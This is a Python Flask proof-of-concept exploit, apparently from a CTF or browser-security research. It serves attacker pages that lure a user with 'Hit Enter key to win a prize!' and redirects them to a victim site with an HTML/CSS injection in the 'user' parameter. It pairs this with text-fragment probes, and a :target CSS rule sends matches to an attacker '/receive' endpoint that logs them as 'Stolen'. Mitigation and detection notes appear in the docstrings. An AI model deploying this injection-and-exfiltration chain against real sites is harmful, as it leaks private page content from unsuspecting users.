poc2_exploit.py
from flask import Flask
from flask import request
import sys
# Flask application that serves the attacker-side pages of this proof of concept.
app = Flask(__name__)

# Origin of the application under test; gen_redirect() targets its `user`
# query parameter.
VICTIM = "http://victim:5000"

# Origin under which this Flask app is expected to be reachable; it is embedded
# in every generated link and in the callback URL.
ATTACKER = "http://attacker:1337"

# Candidate words, probed one per visit to /redirect, in this order.
fruits_all = [
    "Apple",
    "Apricot",
    "Avocado",
    "Banana",
    "Bilberry",
    "Blackberry",
    "Blackcurrant",
    "Blueberry",
    "Boysenberry",
    "Currant",
    "Cherry",
    "Cherimoya",
]
def gen_redirect(try_fruit):
    """Return the HTML/JS page that sends the browser to the victim with one probe.

    The script in the returned page builds a markup snippet (a <style> rule
    plus an autofocused link back to ATTACKER/redirect), URL-encodes it into
    the victim's `user` query parameter and appends a `#:~:text=<try_fruit>`
    text fragment to the URL.  The style rule loads
    ATTACKER/receive/<try_fruit> for whichever element matches `:target`, so
    a hit on /receive/<word> is read as "this word is on the victim page".

    NOTE(review): this presumes the victim reflects `user` without HTML
    escaping and that the browser treats a text-fragment match as the
    `:target` element; neither is shown in this file.

    Mitigation notes for the victim side: HTML-escape the `user` parameter
    on output, restrict inline styles and image origins with a Content
    Security Policy, and consider `Document-Policy: force-load-at-top` to
    opt the page out of text-fragment scrolling.

    Args:
        try_fruit: candidate word; it is interpolated unescaped into both the
            callback URL and the text fragment.
    """
    # `{{` / `}}` are f-string escapes for literal braces; `'\\n'` reaches the
    # browser as the JS escape '\n', so replaceAll() flattens the snippet onto
    # one line before it is URL-encoded.
    page = f"""<script>
let injection = `
<style>:target::before {{ content : url({ATTACKER}/receive/{try_fruit}) }}</style>
<a href='{ATTACKER}/redirect' autofocus><h1>Hit Enter once again!</h1></a>`.replaceAll('\\n', ' ');
location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}#:~:text={try_fruit}`;
</script>
"""
    return page
# Words reported back through /receive/<word>, in arrival order.
extracted_fruits = list()

# Number of /redirect requests served so far; also selects the next candidate
# word.  Module-level state: shared by every client and never reset.
i = 0
@app.route('/redirect')
def redirect():
    """Serve the probe page for the next candidate word.

    Every request increments the module-level counter `i` and returns
    gen_redirect() for the word at that position in `fruits_all`.  Once the
    list is exhausted, a plain closing message is returned instead.

    The counter is process-wide: requests from different browsers advance the
    same sequence, and nothing in this file resets it.
    """
    global i
    i += 1
    if i > len(fruits_all):
        return "Thank you for cooperation"
    # `i` was already incremented, so the current word sits at index i - 1.
    return gen_redirect(fruits_all[i - 1])
@app.route('/')
def solve():
    """Serve the landing page: one autofocused link to ATTACKER/redirect.

    The link carries `autofocus`, so pressing Enter follows it; presumably
    this is what supplies the user gesture for the navigation chain (not
    stated in this file).  The trailing `<script>` tag is left unclosed in
    the original markup and is reproduced unchanged.
    """
    landing_page = f"""<a href='{ATTACKER}/redirect' autofocus>Hit Enter key to win a prize!</a><script>"""
    return landing_page
@app.route('/receive/<word>')
def receiver(word):
    """Record a callback for `word` and print the running list.

    A request to this route is what the `url(...)` in the injected style rule
    produces, so each hit is taken as a positive match for `word`.  The value
    comes straight from the URL path and is not checked against `fruits_all`,
    so any client that can reach this endpoint can add entries.

    Detection note for the victim side: in this flow the browser requests
    ATTACKER/receive/<word> while rendering the victim page, so such requests
    would appear as third-party subresource loads, or as CSP violation
    reports when a policy with reporting is deployed.
    """
    global extracted_fruits
    extracted_fruits.extend([word])
    # Flushed on every call so the output shows up immediately.
    print("Stolen: ", extracted_fruits, file=sys.stdout, flush=True)
    return "ok"